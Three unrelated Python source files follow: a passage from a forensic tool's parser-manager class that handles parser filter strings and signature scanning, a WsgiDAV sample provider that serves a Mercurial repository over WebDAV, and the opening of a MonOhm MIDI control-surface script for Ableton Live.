"""Determines an include and exclude list of parser names.
Takes a comma separated string and splits it up into two lists,
of parsers to include and to exclude from selection. If a particular
filter is prepended with a minus sign it will be included in the
exclude section, otherwise in the include.
Args:
parser_filter_string: The parser filter string.
Returns:
A tuple of two lists, include and exclude.
"""
if not parser_filter_string:
return [], []
# Build the plugin to parser map, which cannot be a class member
# otherwise the map will become invalid if a parser with plugins
# is deregistered.
plugin_to_parser_map = {}
for parser_name, parser_class in cls._parser_classes.iteritems():
if parser_class.SupportsPlugins():
for plugin_name in parser_class.GetPluginNames():
plugin_to_parser_map[plugin_name] = parser_name
includes = set()
excludes = set()
preset_categories = presets.categories.keys()
for filter_string in parser_filter_string.split(u','):
filter_string = filter_string.strip()
if not filter_string:
continue
if filter_string.startswith(u'-'):
active_list = excludes
filter_string = filter_string[1:]
else:
active_list = includes
filter_string = filter_string.lower()
if filter_string in cls._parser_classes:
active_list.add(filter_string)
elif filter_string in preset_categories:
for entry in presets.GetParsersFromCategory(filter_string):
active_list.add(plugin_to_parser_map.get(entry, entry))
else:
active_list.add(plugin_to_parser_map.get(
filter_string, filter_string))
return list(includes), list(excludes)
@classmethod
def GetParserNames(cls, parser_filter_string=None):
"""Retrieves the parser names.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A list of parser names.
"""
parser_names = []
for parser_name, _ in cls.GetParsers(
parser_filter_string=parser_filter_string):
parser_names.append(parser_name)
return parser_names
@classmethod
def GetParserPluginsInformation(cls):
"""Retrieves the parser plugins information.
Returns:
A list of tuples of parser plugin names and descriptions.
"""
parser_plugins_information = []
for _, parser_class in cls.GetParsers():
if parser_class.SupportsPlugins():
for _, plugin_class in parser_class.GetPlugins():
description = getattr(plugin_class, u'DESCRIPTION', u'')
parser_plugins_information.append((plugin_class.NAME, description))
return parser_plugins_information
@classmethod
def GetParserObjects(cls, parser_filter_string=None):
"""Retrieves the parser objects.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A dictionary mapping parser names to parsers objects (instances of
BaseParser).
"""
parser_objects = {}
for parser_name, parser_class in cls.GetParsers(
parser_filter_string=parser_filter_string):
parser_objects[parser_name] = parser_class()
return parser_objects
@classmethod
def GetParsers(cls, parser_filter_string=None):
"""Retrieves the registered parsers.
Retrieves a list of all registered parsers from a parser filter string.
The filter string can contain direct names of parsers, presets or plugins.
The filter string can also negate selection if prepended with a minus sign,
eg: foo,-bar would include parser foo but not include parser bar.
The three types of entries in the filter string:
* name of a parser: this would be the exact name of a single parser to
include (or exclude), eg: foo;
* name of a preset, eg. win7: the presets are defined in
plaso.frontend.presets;
* name of a plugin: if a plugin name is included the parent parser will be
included in the list of registered parsers;
Args:
parser_filter_string: Optional parser filter string. The default is None.
Yields:
A tuple that contains the uniquely identifying name of the parser
and the parser class (subclass of BaseParser).
"""
parsers_to_include, parsers_to_exclude = cls.GetParserFilterListsFromString(
parser_filter_string)
# TODO: Add a warning in the case where an exclusion excludes a parser
# that is also in the inclusion list, eg: user selects chrome_history but
# excludes sqlite.
for parser_name, parser_class in cls._parser_classes.iteritems():
if parsers_to_exclude and parser_name in parsers_to_exclude:
continue
if parsers_to_include and parser_name not in parsers_to_include:
continue
yield parser_name, parser_class
@classmethod
def GetParsersInformation(cls):
"""Retrieves the parsers information.
Returns:
A list of tuples of parser names and descriptions.
"""
parsers_information = []
for _, parser_class in cls.GetParsers():
description = getattr(parser_class, u'DESCRIPTION', u'')
parsers_information.append((parser_class.NAME, description))
return parsers_information
@classmethod
def GetScanner(cls, specification_store):
"""Initializes the scanner object form the specification store.
Args:
specification_store: a specification store (instance of
FormatSpecificationStore).
Returns:
A scanner object (instance of pysigscan.scanner).
"""
scanner_object = pysigscan.scanner()
for format_specification in specification_store.specifications:
for signature in format_specification.signatures:
pattern_offset = signature.offset
if pattern_offset is None:
signature_flags = pysigscan.signature_flags.NO_OFFSET
elif pattern_offset < 0:
pattern_offset *= -1
signature_flags = pysigscan.signature_flags.RELATIVE_FROM_END
else:
signature_flags = pysigscan.signature_flags.RELATIVE_FROM_START
scanner_object.add_signature(
signature.identifier, pattern_offset, signature.pattern,
signature_flags)
return scanner_object
@classmethod
def GetSpecificationStore(cls, parser_filter_string=None):
"""Retrieves the specification store for the parsers.
This method will create a specification store for parsers that define
a format specification and a list of parser names for those that do not.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A tuple of a format specification store (instance of
FormatSpecificationStore) and the list of remaining parser names
that do not have a format specification.
"""
specification_store = specification.FormatSpecificationStore()
remainder_list = []
for parser_name, parser_class in cls.GetParsers(
parser_filter_string=parser_filter_string):
format_specification = parser_class.GetFormatSpecification()
if format_specification is not None:
specification_store.AddSpecification(format_specification)
else:
remainder_list.append(parser_name)
return specification_store, remainder_list
@classmethod
def GetWindowsRegistryPlugins(cls):
"""Build a list of all available Windows Registry plugins.
Returns:
A plugins list (instance of PluginList).
"""
parser_class = cls._parser_classes.get(u'winreg', None)
if not parser_class:
return
return parser_class.GetPluginList()
@classmethod
def RegisterParser(cls, parser_class):
"""Registers a parser class.
The parser classes are identified based on their lower case name.
Args:
parser_class: the class object of the parser.
Raises:
KeyError: if parser class is already set for the corresponding name.
"""
parser_name = parser_class.NAME.lower()
if parser_name in cls._parser_classes:
raise KeyError((u'Parser class already set for name: {0:s}.').format(
parser_class.NAME))
cls._parser_classes[parser_name] = parser_class
@classmethod
def RegisterParsers(cls, parser_classes):
"""Registers parser classes.
The parser classes are identified based on their lower case name.
Args:
parser_classes: a list of class objects of the parsers.
Raises:
KeyError: if parser class is already set for the corresponding name.
"""
for parser_class in parser_classes:
cls.RegisterParser(parser_class)
|
|
# -*- coding: iso-8859-1 -*-
# (c) 2009-2014 Martin Wendt and contributors; see WsgiDAV https://github.com/mar10/wsgidav
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
"""
DAV provider that publishes a Mercurial repository.
Note: This is **not** production code!
The repository is rendered as three top level collections.
edit:
Contains the working directory, i.e. all files. This includes uncommitted
changes and untracked new files.
This folder is writable.
released:
Contains the latest committed files, also known as 'tip'.
This folder is read-only.
archive:
Contains the last 10 revisions as sub-folders.
This folder is read-only.
Sample layout::
/<share>/
edit/
server/
ext_server.py
README.txt
released/
archive/
19/
18/
...
Supported features:
#. Copying or moving files from ``/edit/..`` to the ``/edit/..`` folder will
result in a ``hg copy`` or ``hg rename``.
#. Deleting resources from ``/edit/..`` will result in a ``hg remove``.
#. Copying or moving files from ``/edit/..`` to the ``/released`` folder will
result in a ``hg commit``.
Note that the destination path is ignored, instead the source path is used.
So a user can drag a file or folder from somewhere under the ``edit/..``
directory and drop it directly on the ``released`` directory to commit
changes.
#. To commit all changes, simply drag'n'drop the ``/edit`` folder on the
``/released`` folder.
#. Creating new collections results in creation of a file called ``.directory``,
which is then ``hg add`` ed since Mercurial doesn't track directories.
#. Some attributes are published as live properties, such as ``{hg:}date``.
Known limitations:
#. This 'commit by drag-and-drop' only works, if the WebDAV clients produces
MOVE or COPY requests. Alas, some clients will send PUT, MKCOL, ... sequences
instead.
#. Adding and then removing a file without committing after the 'add' will
leave this file on disk (untracked)
This happens for example whit lock files that Open Office Write and other
applications will create.
#. Dragging the 'edit' folder onto 'released' with Windows File Explorer will
remove the folder in the explorer view, although WsgiDAV did not delete it.
This seems to be done by the client.
See:
http://mercurial.selenic.com/wiki/MercurialApi
Requirements:
``easy_install mercurial`` or install the API as non-standalone version
from here: http://mercurial.berkwood.com/
http://mercurial.berkwood.com/binaries/mercurial-1.4.win32-py2.6.exe
"""
from pprint import pprint
from wsgidav.dav_error import DAVError, HTTP_FORBIDDEN
import os
from wsgidav.samples.dav_provider_tools import VirtualCollection
try:
from hashlib import md5
except ImportError:
from md5 import md5
import time
import sys
#import mimetypes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO #@UnusedImport
from wsgidav.dav_provider import DAVProvider, _DAVResource
from wsgidav import util
try:
import mercurial.ui
from mercurial.__version__ import version as hgversion
from mercurial import commands, hg
#from mercurial import util as hgutil
except ImportError:
print >>sys.stderr, "Could not import Mercurial API. Try 'easy_install -U mercurial'."
raise
__docformat__ = "reStructuredText en"
_logger = util.getModuleLogger(__name__)
BUFFER_SIZE = 8192
#===============================================================================
# HgResource
#===============================================================================
class HgResource(_DAVResource):
"""Abstract base class for all resources."""
def __init__(self, path, isCollection, environ, rev, localHgPath):
super(HgResource, self).__init__(path, isCollection, environ)
self.rev = rev
self.localHgPath = localHgPath
self.absFilePath = self._getFilePath()
assert not "\\" in self.localHgPath
assert not "/" in self.absFilePath
if isCollection:
self.fctx = None
else:
# Change Context for the requested revision:
# rev=None: current working dir
# rev="tip": TIP
# rev=<int>: Revision ID
wdctx = self.provider.repo[self.rev]
self.fctx = wdctx[self.localHgPath]
# util.status("HgResource: path=%s, rev=%s, localHgPath=%s, fctx=%s" % (self.path, self.rev, self.localHgPath, self.fctx))
# util.status("HgResource: name=%s, dn=%s, abspath=%s" % (self.name, self.getDisplayName(), self.absFilePath))
def _getFilePath(self, *addParts):
parts = self.localHgPath.split("/")
if addParts:
parts.extend(addParts)
return os.path.join(self.provider.repo.root, *parts)
def _commit(self, message):
user = self.environ.get("http_authenticator.username") or "Anonymous"
commands.commit(self.provider.ui, self.provider.repo,
self.localHgPath,
addremove=True,
user=user,
message=message)
def _checkWriteAccess(self):
"""Raise HTTP_FORBIDDEN, if resource is unwritable."""
if self.rev is not None:
# Only working directory may be edited
raise DAVError(HTTP_FORBIDDEN)
def getContentLength(self):
if self.isCollection:
return None
return self.fctx.size()
def getContentType(self):
if self.isCollection:
return None
# (mimetype, _mimeencoding) = mimetypes.guess_type(self.path)
# if not mimetype:
# return "application/octet-stream"
# return mimetype
return util.guessMimeType(self.path)
def getCreationDate(self):
# statresults = os.stat(self._filePath)
# return statresults[stat.ST_CTIME]
return None # TODO
def getDisplayName(self):
if self.isCollection or self.fctx.filerev() is None:
return self.name
return "%s@%s" % (self.name, self.fctx.filerev())
def getEtag(self):
return md5(self.path).hexdigest() + "-" + str(self.getLastModified()) + "-" + str(self.getContentLength())
def getLastModified(self):
if self.isCollection:
return None
# (secs, tz-ofs)
return self.fctx.date()[0]
def supportRanges(self):
return False
def getMemberNames(self):
assert self.isCollection
cache = self.environ["wsgidav.hg.cache"][str(self.rev)]
dirinfos = cache["dirinfos"]
if not dirinfos.has_key(self.localHgPath):
return []
return dirinfos[self.localHgPath][0] + dirinfos[self.localHgPath][1]
# return self.provider._listMembers(self.path)
def getMember(self, name):
# Rely on provider to get member oinstances
assert self.isCollection
return self.provider.getResourceInst(util.joinUri(self.path, name),
self.environ)
def getDisplayInfo(self):
if self.isCollection:
return {"type": "Directory"}
return {"type": "File"}
def getPropertyNames(self, isAllProp):
"""Return list of supported property names in Clark Notation.
See DAVResource.getPropertyNames()
"""
# Let base class implementation add supported live and dead properties
propNameList = super(HgResource, self).getPropertyNames(isAllProp)
# Add custom live properties (report on 'allprop' and 'propnames')
if self.fctx:
propNameList.extend(["{hg:}branch",
"{hg:}date",
"{hg:}description",
"{hg:}filerev",
"{hg:}rev",
"{hg:}user",
])
return propNameList
def getPropertyValue(self, propname):
"""Return the value of a property.
See getPropertyValue()
"""
# Supported custom live properties
if propname == "{hg:}branch":
return self.fctx.branch()
elif propname == "{hg:}date":
# (secs, tz-ofs)
return str(self.fctx.date()[0])
elif propname == "{hg:}description":
return self.fctx.description()
elif propname == "{hg:}filerev":
return str(self.fctx.filerev())
elif propname == "{hg:}rev":
return str(self.fctx.rev())
elif propname == "{hg:}user":
return str(self.fctx.user())
# Let base class implementation report live and dead properties
return super(HgResource, self).getPropertyValue(propname)
def setPropertyValue(self, propname, value, dryRun=False):
"""Set or remove property value.
See DAVResource.setPropertyValue()
"""
raise DAVError(HTTP_FORBIDDEN)
def preventLocking(self):
"""Return True, to prevent locking.
See preventLocking()
"""
if self.rev is not None:
# Only working directory may be locked
return True
return False
def createEmptyResource(self, name):
"""Create and return an empty (length-0) resource as member of self.
See DAVResource.createEmptyResource()
"""
assert self.isCollection
self._checkWriteAccess()
filepath = self._getFilePath(name)
f = open(filepath, "w")
f.close()
commands.add(self.provider.ui, self.provider.repo, filepath)
# getResourceInst() won't work, because the cached manifest is outdated
# return self.provider.getResourceInst(self.path.rstrip("/")+"/"+name, self.environ)
return HgResource(self.path.rstrip("/")+"/"+name, False,
self.environ, self.rev, self.localHgPath+"/"+name)
def createCollection(self, name):
"""Create a new collection as member of self.
A dummy member is created, because Mercurial doesn't handle folders.
"""
assert self.isCollection
self._checkWriteAccess()
collpath = self._getFilePath(name)
os.mkdir(collpath)
filepath = self._getFilePath(name, ".directory")
f = open(filepath, "w")
f.write("Created by WsgiDAV.")
f.close()
commands.add(self.provider.ui, self.provider.repo, filepath)
def getContent(self):
"""Open content as a stream for reading.
See DAVResource.getContent()
"""
assert not self.isCollection
d = self.fctx.data()
return StringIO(d)
def beginWrite(self, contentType=None):
"""Open content as a stream for writing.
See DAVResource.beginWrite()
"""
assert not self.isCollection
self._checkWriteAccess()
mode = "wb"
# GC issue 57: always store as binary
# if contentType and contentType.startswith("text"):
# mode = "w"
return file(self.absFilePath, mode, BUFFER_SIZE)
def endWrite(self, withErrors):
"""Called when PUT has finished writing.
See DAVResource.endWrite()
"""
if not withErrors:
commands.add(self.provider.ui, self.provider.repo, self.localHgPath)
# def handleDelete(self):
# """Handle a DELETE request natively.
#
# """
# self._checkWriteAccess()
# return False
def supportRecursiveDelete(self):
"""Return True, if delete() may be called on non-empty collections
(see comments there)."""
return True
def delete(self):
"""Remove this resource (recursive)."""
self._checkWriteAccess()
filepath = self._getFilePath()
commands.remove(self.provider.ui, self.provider.repo,
filepath,
force=True)
def handleCopy(self, destPath, depthInfinity):
"""Handle a COPY request natively.
"""
destType, destHgPath = util.popPath(destPath)
destHgPath = destHgPath.strip("/")
ui = self.provider.ui
repo = self.provider.repo
util.write("handleCopy %s -> %s" % (self.localHgPath, destHgPath))
if self.rev is None and destType == "edit":
# COPY /edit/a/b to /edit/c/d: turn into 'hg copy -f a/b c/d'
commands.copy(ui, repo,
self.localHgPath,
destHgPath,
force=True)
elif self.rev is None and destType == "released":
# COPY /edit/a/b to /released/c/d
# This is interpreted as 'hg commit a/b' (ignoring the dest. path)
self._commit("WsgiDAV commit (COPY %s -> %s)" % (self.path, destPath))
else:
raise DAVError(HTTP_FORBIDDEN)
# Return True: request was handled
return True
def handleMove(self, destPath):
"""Handle a MOVE request natively.
"""
destType, destHgPath = util.popPath(destPath)
destHgPath = destHgPath.strip("/")
ui = self.provider.ui
repo = self.provider.repo
util.write("handleCopy %s -> %s" % (self.localHgPath, destHgPath))
if self.rev is None and destType == "edit":
# MOVE /edit/a/b to /edit/c/d: turn into 'hg rename -f a/b c/d'
commands.rename(ui, repo, self.localHgPath, destHgPath,
force=True)
elif self.rev is None and destType == "released":
# MOVE /edit/a/b to /released/c/d
# This is interpreted as 'hg commit a/b' (ignoring the dest. path)
self._commit("WsgiDAV commit (MOVE %s -> %s)" % (self.path, destPath))
else:
raise DAVError(HTTP_FORBIDDEN)
# Return True: request was handled
return True
#===============================================================================
# HgResourceProvider
#===============================================================================
class HgResourceProvider(DAVProvider):
"""
DAV provider that serves a VirtualResource derived structure.
"""
def __init__(self, repoRoot):
super(HgResourceProvider, self).__init__()
self.repoRoot = repoRoot
print "Mercurial version %s" % hgversion
self.ui = mercurial.ui.ui()
self.repo = hg.repository(self.ui, repoRoot)
self.ui.status("Connected to repository %s\n" % self.repo.root)
self.repoRoot = self.repo.root
# Some commands (remove) seem to expect cwd set to the repo
# TODO: try to go along without this, because it prevents serving
# multiple repos. Instead pass absolute paths to the commands.
# print os.getcwd()
os.chdir(self.repo.root)
# Verify integrity of the repository
util.status("Verify repository '%s' tree..." % self.repo.root)
commands.verify(self.ui, self.repo)
# self.ui.status("Changelog: %s\n" % self.repo.changelog)
print "Status:"
pprint(self.repo.status())
self.repo.ui.status("the default username to be used in commits: %s\n" % self.repo.ui.username())
# self.repo.ui.status("a short form of user name USER %s\n" % self.repo.ui.shortuser(user))
self.ui.status("Expandpath: %s\n" % self.repo.ui.expandpath(repoRoot))
print "Working directory state summary:"
self.ui.pushbuffer()
commands.summary(self.ui, self.repo, remote=False)
res = self.ui.popbuffer().strip()
reslines = [ tuple(line.split(":", 1)) for line in res.split("\n")]
pprint(reslines)
print "Repository state summary:"
self.ui.pushbuffer()
commands.identify(self.ui, self.repo,
num=True, id=True, branch=True, tags=True)
res = self.ui.popbuffer().strip()
reslines = [ tuple(line.split(":", 1)) for line in res.split("\n")]
pprint(reslines)
self._getLog()
def _getLog(self, limit=None):
"""Read log entries into a list of dictionaries."""
self.ui.pushbuffer()
commands.log(self.ui, self.repo, limit=limit,
date=None, rev=None, user=None)
res = self.ui.popbuffer().strip()
logList = []
for logentry in res.split("\n\n"):
log = {}
logList.append(log)
for line in logentry.split("\n"):
k, v = line.split(":", 1)
assert k in ("changeset", "tag", "user", "date", "summary")
log[k.strip()] = v.strip()
log["parsed_date"] = util.parseTimeString(log["date"])
local_id, unid = log["changeset"].split(":")
log["local_id"] = int(local_id)
log["unid"] = unid
# pprint(logList)
return logList
def _getRepoInfo(self, environ, rev, reload=False):
"""Return a dictionary containing all files under source control.
dirinfos:
Dictionary containing direct members for every collection.
{folderpath: (collectionlist, filelist), ...}
files:
Sorted list of all file paths in the manifest.
filedict:
Dictionary containing all files under source control.
::
{'dirinfos': {'': (['wsgidav',
'tools',
'WsgiDAV.egg-info',
'tests'],
['index.rst',
'wsgidav MAKE_DAILY_BUILD.launch',
'wsgidav run_server.py DEBUG.launch',
'wsgidav-paste.conf',
...
'setup.py']),
'wsgidav': (['addons', 'samples', 'server', 'interfaces'],
['__init__.pyc',
'dav_error.pyc',
'dav_provider.pyc',
...
'wsgidav_app.py']),
},
'files': ['.hgignore',
'ADDONS.txt',
'wsgidav/addons/mysql_dav_provider.py',
...
],
'filedict': {'.hgignore': True,
'README.txt': True,
'WsgiDAV.egg-info/PKG-INFO': True,
}
}
"""
caches = environ.setdefault("wsgidav.hg.cache", {})
if caches.get(str(rev)) is not None:
util.debug("_getRepoInfo(%s): cache hit." % rev)
return caches[str(rev)]
start_time = time.time()
self.ui.pushbuffer()
commands.manifest(self.ui, self.repo, rev)
res = self.ui.popbuffer()
files = []
dirinfos = {}
filedict = {}
for file in res.split("\n"):
if file.strip() == "":
continue
file = file.replace("\\", "/")
# add all parent directories to 'dirinfos'
parents = file.split("/")
if len(parents) >= 1:
p1 = ""
for i in range(0, len(parents)-1):
p2 = parents[i]
dir = dirinfos.setdefault(p1, ([], []))
if not p2 in dir[0]:
dir[0].append(p2)
if p1 == "":
p1 = p2
else:
p1 = "%s/%s" % (p1, p2)
dirinfos.setdefault(p1, ([], []))[1].append(parents[-1])
filedict[file] = True
files.sort()
cache = {"files": files,
"dirinfos": dirinfos,
"filedict": filedict,
}
caches[str(rev)] = cache
util.note("_getRepoInfo(%s) took %.3f" % (rev, time.time() - start_time)
# , var=cache
)
return cache
# def _listMembers(self, path, rev=None):
# """Return a list of all non-collection members"""
# # Pattern for direct members:
# glob = "glob:" + os.path.join(path, "*").lstrip("/")
## print glob
# self.ui.pushbuffer()
# commands.status(self.ui, self.repo,
# glob,
# all=True)
# lines = self.ui.popbuffer().strip().split("\n")
# pprint(lines)
# return dict
def getResourceInst(self, path, environ):
"""Return HgResource object for path.
See DAVProvider.getResourceInst()
"""
self._count_getResourceInst += 1
# HG expects the resource paths without leading '/'
localHgPath = path.strip("/")
rev = None
cmd, rest = util.popPath(path)
if cmd == "":
return VirtualCollection(path, environ,
"root",
["edit", "released", "archive"])
elif cmd == "edit":
localHgPath = rest.strip("/")
rev = None
elif cmd == "released":
localHgPath = rest.strip("/")
rev = "tip"
elif cmd == "archive":
if rest == "/":
# Browse /archive: return a list of revision folders:
loglist = self._getLog(limit=10)
members = [ str(l["local_id"]) for l in loglist ]
return VirtualCollection(path, environ, "Revisions", members)
revid, rest = util.popPath(rest)
try:
int(revid)
except:
# Tried to access /archive/anyname
return None
# Access /archive/19
rev = revid
localHgPath = rest.strip("/")
else:
return None
# read mercurial repo into request cache
cache = self._getRepoInfo(environ, rev)
if localHgPath in cache["filedict"]:
# It is a version controlled file
return HgResource(path, False, environ, rev, localHgPath)
if localHgPath in cache["dirinfos"] or localHgPath == "":
# It is an existing folder
return HgResource(path, True, environ, rev, localHgPath)
return None
|
|
# http://www.aumhaa.com
# by amounra 0313
from __future__ import with_statement
import Live
import time
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from _Framework.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from _Framework.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
"""Imports from _Mono_Framework"""
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.DeviceSelectorComponent import DeviceSelectorComponent
from _Mono_Framework.ResetSendsComponent import ResetSendsComponent
from _Mono_Framework.DetailViewControllerComponent import DetailViewControllerComponent
from _Mono_Framework.MonomodComponent import MonomodComponent
from _Mono_Framework.LiveUtils import *
"""Custom files, overrides, and files from other scripts"""
from _Generic.Devices import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
class FunctionModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(FunctionModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._set_protected_mode_index(0)
def number_of_modes(self):
return 6
def set_mode_buttons(self, buttons):
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
if (buttons != None):
for button in buttons:
assert isinstance(button, ButtonElement)
identify_sender = True
button.add_value_listener(self._mode_value, identify_sender)
self._modes_buttons.append(button)
for index in range(len(self._modes_buttons)):
if (index == self._mode_index):
self._modes_buttons[index].turn_on()
else:
self._modes_buttons[index].turn_off()
def set_mode_toggle(self, button):
assert ((button == None) or isinstance(button, ButtonElement))
if (self._mode_toggle != None):
self._mode_toggle.remove_value_listener(self._toggle_value)
self._mode_toggle = button
if (self._mode_toggle != None):
self._mode_toggle.add_value_listener(self._toggle_value)
class MonomodModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(MonomodModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._set_protected_mode_index(0)
def number_of_modes(self):
return 2
def set_mode_toggle(self, button):
assert ((button == None) or isinstance(button, ButtonElement))
if (self._mode_toggle != None):
self._mode_toggle.remove_value_listener(self._toggle_value)
self._mode_toggle = button
if (self._mode_toggle != None):
self._mode_toggle.add_value_listener(self._toggle_value)
class ShiftModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(ShiftModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._mode_toggle1 = None
self._mode_toggle2 = None
self._toggle1_value = 0
self._toggle2_value = 0
self._mode_index = 0
self._last_mode = 0
self._set_protected_mode_index(0)
def set_mode_toggle(self, button1, button2):
assert ((button1 == None) or isinstance(button1, ButtonElement))
if (self._mode_toggle1 != None):
self._mode_toggle1.remove_value_listener(self._toggle_value_left)
self._mode_toggle1 = button1
if (self._mode_toggle1 != None):
self._mode_toggle1.add_value_listener(self._toggle_value_left)
assert ((button2 == None) or isinstance(button2, ButtonElement))
if (self._mode_toggle2 != None):
self._mode_toggle2.remove_value_listener(self._toggle_value_right)
self._mode_toggle2 = button2
if (self._mode_toggle2 != None):
self._mode_toggle2.add_value_listener(self._toggle_value_right)
def _toggle_value_left(self, value):
self._toggle1_value = value
self._toggle_value(value, 'left')
def _toggle_value_right(self, value):
self._toggle2_value = value
self._toggle_value(value, 'right')
def _toggle_value(self, value, side):
assert (self._mode_toggle1 != None)
assert (self._mode_toggle2 != None)
assert isinstance(value, int)
if((value > 0) and ((side is 'left' and self._toggle2_value > 0) or (side is 'right' and self._toggle1_value > 0))):
if(self._last_mode is 0):
self._last_mode = 1
self.set_mode(4) #self.set_mode(self._last_mode)
else:
self._last_mode = 0
#self.set_mode(self._last_mode)
if(side is 'left'):
self.set_mode(2)
if(side is 'right'):
self.set_mode(3)
#elif((value > 0) and ((side is 'left' and self._toggle2_value > 0) or (side is 'right' and self._toggle1_value > 0))):
elif(value is 0) and (self._toggle1_value is 0) and (self._toggle2_value is 0):
self.set_mode(self._last_mode)
elif(value > 0 and self._last_mode is 1):
self.set_mode(4)
else:
if (side is 'left' and value > 0):
self.set_mode(2)
elif (side is 'right' and value > 0):
self.set_mode(3)
def number_of_modes(self):
return 5
class MonOhm(ControlSurface):
__module__ = __name__
__doc__ = " Monomodular control script for Ohm64 and OhmRGB "
def __init__(self, *a, **k):
super(MonOhm, self).__init__(*a, **k)
self._monomod_version = 'b995'
self._codec_version = 'b995'
self._cntrlr_version = 'b995'
self._cntrlr = None
self._host_name = 'MonOhm'
self._color_type = 'OhmRGB'
self._update_linked_device_selection = None
self._link_mixer = LINK_MIXER
self.hosts = []
self._bright = True
self._rgb = 0
self._timer = 0
self.flash_status = 1
self._is_split = True
self._clutch_device_selection = False
self._touched = 0
self._backlight = 127
self._backlight_type = 'static'
self._ohm = 127
self._ohm_type = 'static'
self._pad_translations = PAD_TRANSLATION
self._update_linked_device_selection = None
self._use_pedal = USE_PEDAL
self._disable_master = DISABLE_MASTER_VOLUME
self._mem = [4, 8, 12]
self._mixers = []
self._sessions = []
self._zooms = []
self._function_modes = []
with self.component_guard():
self.log_message("<<<<<<<<<<<<<<<<<<<<= MonOhm " + str(self._monomod_version) + " log opened =>>>>>>>>>>>>>>>>>>>")
self.log_message("<<<<<<<<<<<<<<<<<<<<= Map file for " + str(MAP_VERSION) + " =>>>>>>>>>>>>>>>>>>>")
self._setup_monobridge()
self._setup_controls()
self._setup_transport_control()
self._setup_mixer_control()
self._setup_session_control()
self._setup_device_control()
self._setup_crossfader()
self._setup_device_selector()
self._setup_monomod()
self._setup_modes()
self.song().view.add_selected_track_listener(self._update_selected_device)
if FORCE_TYPE is True:
self._rgb = FORCE_COLOR_TYPE
else:
self.schedule_message(10, self.query_ohm, None)
self.show_message('MonOhm Control Surface Loaded')
self._send_midi(tuple(switchxfader))
#self._send_midi(tuple(assigncolors))
"""script initialization methods"""
def query_ohm(self):
#self.log_message('querying ohm64')
self._send_midi(tuple(check_model))
def _setup_monobridge(self):
self._monobridge = MonoBridgeElement(self)
self._monobridge.name = 'MonoBridge'
def _setup_controls(self):
is_momentary = True
self._fader = [None for index in range(8)]
self._dial = [None for index in range(16)]
self._button = [None for index in range(8)]
self._menu = [None for index in range(6)]
for index in range(8):
self._fader[index] = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, OHM_FADERS[index], Live.MidiMap.MapMode.absolute, 'Fader_' + str(index), index, self)
for index in range(8):
self._button[index] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, OHM_BUTTONS[index], 'Button_' + str(index), self)
for index in range(16):
self._dial[index] = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, OHM_DIALS[index], Live.MidiMap.MapMode.absolute, 'Dial_' + str(index), index + 8, self)
for index in range(6):
self._menu[index] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, OHM_MENU[index], 'Menu_' + str(index), self)
self._crossfader = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, CROSSFADER, Live.MidiMap.MapMode.absolute, "Crossfader", 24, self)
self._livid = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, LIVID, 'Livid_Button', self)
self._shift_l = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, SHIFT_L, 'Shift_Button_Left', self)
